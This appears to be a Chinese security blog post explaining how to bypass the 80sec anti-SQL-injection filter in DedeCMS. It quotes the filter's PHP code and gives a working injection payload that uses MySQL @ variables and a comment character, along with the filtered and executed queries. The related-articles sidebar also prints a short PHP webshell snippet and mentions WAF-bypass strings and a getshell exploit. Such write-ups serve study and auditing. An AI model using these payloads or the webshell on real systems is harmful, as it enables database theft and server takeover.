【渗透】关于80sec防注入绕过

于 2021-05-22 13:35:45 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: WEB安全 文章标签: mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/V1040375575/article/details/117158148
版权

知识点:

在Mysql当中,定义变量用@字符,可以用set @a='abc',来为变量赋值,然后通过select @a来进行取值

在这里插入图片描述
通过上面的了解,可以直接定义一个空值的变量出来,比如 @``,结果如下:
在这里插入图片描述

80Ssec过滤代码:

	//SQL语句过滤程序,由80sec提供,这里作了适当的修改
    function CheckSql($sql, $querytype='select')
    {
        $clean   = '';
        $error   = '';
		$pos     = -1;
        $old_pos = 0;


        //如果是普通查询语句,直接过滤一些特殊语法
        if($querytype == 'select')
        {
            if(preg_match('/[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}/', $sql))
            {
				$this->DisplayError("$sql||SelectBreak",1);
            }
        }

        //完整的SQL检查
        while(true)
        {
            $pos = strpos($sql, '\'', $pos + 1); //不存在单引号就跳出
            if($pos === false)
            {
                break;
            }
            $clean .= substr($sql, $old_pos, $pos - $old_pos);

            while(true)
            {
                $pos1 = strpos($sql, '\'', $pos + 1);
                $pos2 = strpos($sql, '\\', $pos + 1);
                if($pos1 === false)
                {
                    break;
                }
                else if($pos2 == false || $pos2 > $pos1)
                {
                    $pos = $pos1;
                    break;
                }
                $pos = $pos2 + 1;
            }

            $clean .= '$s$';
            $old_pos = $pos + 1;
        }
        ...

这里为了合法的构造出一个单引号,目的是为了让sql正确,我们可以用 @' 放入sql语句当中,帮助我们绕过防注入程序检查,这两个也可以进行使用:@'@,"'"在这里插入图片描述

在审计的时候遇到一个整形的注入点,该如何绕过(gpc开启的状态下,其实这里开不开都无所谓,因为dede中自己也会进行对应的处理的)?如下的代码可以知道,当被两边单引号包裹的地方会被替换为$s$

注入绕过语句:1 or @' and (select length(database())=11)#’

过滤处理后的语句:select XXXX from XX_station_letters where id = 1 or @`$s$ order by createdtime desc

最后执行的语句:SELECT XXXX FROM XX_station_letters where id = 1 or @' and (select length(database())=11)

在这里插入图片描述@'和 #’ 来配合包裹对中间的语句作为 s s s处理直接绕过了80sec注入,然后右边又是一个注释符过滤了单引号

引用:
https://www.cnblogs.com/milantgh/p/3670208.html
https://www.isolves.com/it/aq/fwq/2019-12-11/9754.html

pandarking
关注
专栏目录
sql注入原理及php注入代码.doc
12-02
SQL注入原理及PHP注入代码 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在用户输入中注入恶意SQL代码来...止SQL注入需要了解SQL注入原理和止SQL注入的方法,使用注入函数和代码来止SQL注入
国内安全团队80sec发现nginx重大漏洞
renziming的专栏
06-01 2220
<br />国内安全团队80sec于5.20日下午6点发布了一个关于nginx的漏洞通告,由于该漏洞的存在,使用nginx+php组建的网站只要允 许上传图片就可能被黑客入侵,直到5.21日凌晨,nginx尚未发布修复该漏洞的补丁。<br />由于nginx有漏洞,这100万台服务器可能通过上传图片的方法被黑客轻易的植入木马。植入木马的过程也非常简单,就是把木马改成图片上传。具体细节:<br />http://www.80sec.com/nginx-securit.html<br />80sec团队由一群年
80sec被黑原因分析
weixin_33733810的博客
12-01 680
[ 目录 ] 0×00 事件背景 0×01 应急响应 0×02 事件分析 0×03 事件启示 0×04 总结 0×00 事件背景 在感恩节的晚上,我们的站点遭遇了***,几名未知性别的***成功涂改掉了我们的首页,事情发生后很多朋友对我们被***的原因和经过都很关心,各种猜测都有,加上我们后续对于这次***的分析结果来看,我们觉得整次***和事后应急及分析的...
80sec里面的小马
Yatere的天平秤
02-07 956
session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a'); 黑客果然是为了ev
[80Sec]深掘XSS漏洞场景之XSS Rootkit
weixin_30518397的博客
10-17 115
80SEC的牛。 转载开始。 深掘XSS漏洞场景之XSS Rootkit[完整修订版] EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011-10-15 0×00 前言 众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为持久...
浅谈绕过WAF的数种方法.txt
07-18
id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users`,则可以成功绕过WAF并执行SQL注入攻击。 #### 五、总结 绕过WAF的技术多种多样,上述只是其中的一部分。在实际操作中,还需要结合具体的应用...
比较好用的PHP注入漏洞过滤函数代码
10-28
7. 注入判断:inject_check函数通过正则表达式检测输入字符串中是否包含SQL注入常用的关键字,如SELECT、INSERT、UPDATE、DELETE等,以及潜在的跨站脚本攻击代码。如果匹配到这些关键字,则认为可能是注入攻击并...
代码审计之_seacms10.1
whojoe的博客
07-20 989
前言 本文已经首发于freebuf https://www.freebuf.com/vuls/241106.html seacms是一个代码审计入门级的cms,比较适合我这种小白玩家来学习,如果有什么错误欢迎指出。 环境 phpstudy pro php5.4.45nts seay代码审计工具 phpstrom sqlmap seacms v10.1 因为这个cms的官网已经打不开了,所以发一下自己保存的代码 链接https://pan.baidu.com/s/1f9mXyOX6sgsersyNz-kDQg
浅谈Ddos******与
weixin_33790053的博客
02-13 151
From: http://www.80sec.com/ [ 目录 ] 一 背景 二 应急响应 三 常见ddos***及御 四 根源及反击 五 总结 一 背景 在前几天,我们运营的某网站遭受了一次ddos***,我们的网站是一个公益性质的网站,为各个厂商和白帽子之间搭建一个平台以传递安全问题等信息,我们并不清楚因为什么原因会遭遇这种无耻的***。因为我们本身...
80sec感恩节事件分析
cnbird's blog
11-30 2351
EMail: jianxin#80sec.com Site: http://www.80sec.com Date: 2011-11-30 From: http://www.80sec.com/ [ 目录 ] 0×00 事件背景 0×01 应急响应 0×02 事件分析 0×03 事件启示 0×04 总结 0×00 事件背景 在感恩节的晚上,我们的站点遭遇了攻击,几名未知性别的黑
DVWA-WooYun SQL Injection
zrools的博客
02-05 3223
乌云靶场 - SQL InjectionSqli QUERY_STRINGWooYun-2014-61361 Sourceinject_check(strtolower($_SERVER['QUERY_STRING'])); $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id
DeDecms变量覆盖之SQL语句分析报告+修复方案
weixin_34409741的博客
06-08 124
信息安全交流论坛 BBS.ITSEC.PW 作者:y0umer DEDECMS变量覆盖漏洞分析 昨天暗月凌晨找我搞基.他分析了此漏洞.所以才有得此文. DEDECMS为什么那么多变量覆盖呢? 是因为程序员懒啊! 我也不去批评程序员了.因为我也是一个程序员,程序员何必为难程序员呢? 好的.漏洞开始. 首先,根据发布出来的文章可以断定.又是一个插件引发的悲剧. 看代码: /plus/...
几种通用注入程序绕过方法
收集盒 Book box
10-06 1103
0x00 前言 目前主流的CMS系统当中都会内置一些注入的程序,例如Discuz、dedeCMS等,本篇主要介绍绕过方法。 0x01 Discuz x2.0注入 注入原理 这里以Discuz最近爆出的一个插件的注入漏洞为例,来详细说明绕过方法。 漏洞本身很简单,存在于/source/plugin/v63shop/config.inc.php中的第29行getGoods函数中
讨论下IDS的绕过
weixin_34049032的博客
09-02 217
自从知道dedecms自带了80sec的内置Mysqlids后,一直以来也没有想到绕过的办法。或者是自己mysql的根底太差了吧。于是分析dedecms源码时,只找模板执行,本地包含,上传等,完全没有想到注入存在的可能性了。 可以看看某牛的很久以前的分析 http://www.oldjun.com/blog/index.php/archives/66/(其中:80sec的内置Mysqlids可能...
第二篇 sql check约束
加菲的专栏
10-21 4143
SQL中的CHECK约束的详细讲解 CHECK 约束(CHECK 约束:定义列中可接受的数据值。可以将 CHECK 约束应用于多个列,也可以将多个 CHECK 约束应用于单个列。当除去某个表时,也将除去 CHECK 约束。)指定可由表中一列或多列接受的数据值或格式。例如,可以要求 authors 表的 zip 列只允许输入五位数的数字项。    可以为一个表定义许多 CHECK 约束。可以使用
dedecms最新版本修改任意管理员漏洞+getshell+exp
weixin_30439067的博客
08-03 4207
此漏洞无视gpc转义,过80sec注入御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值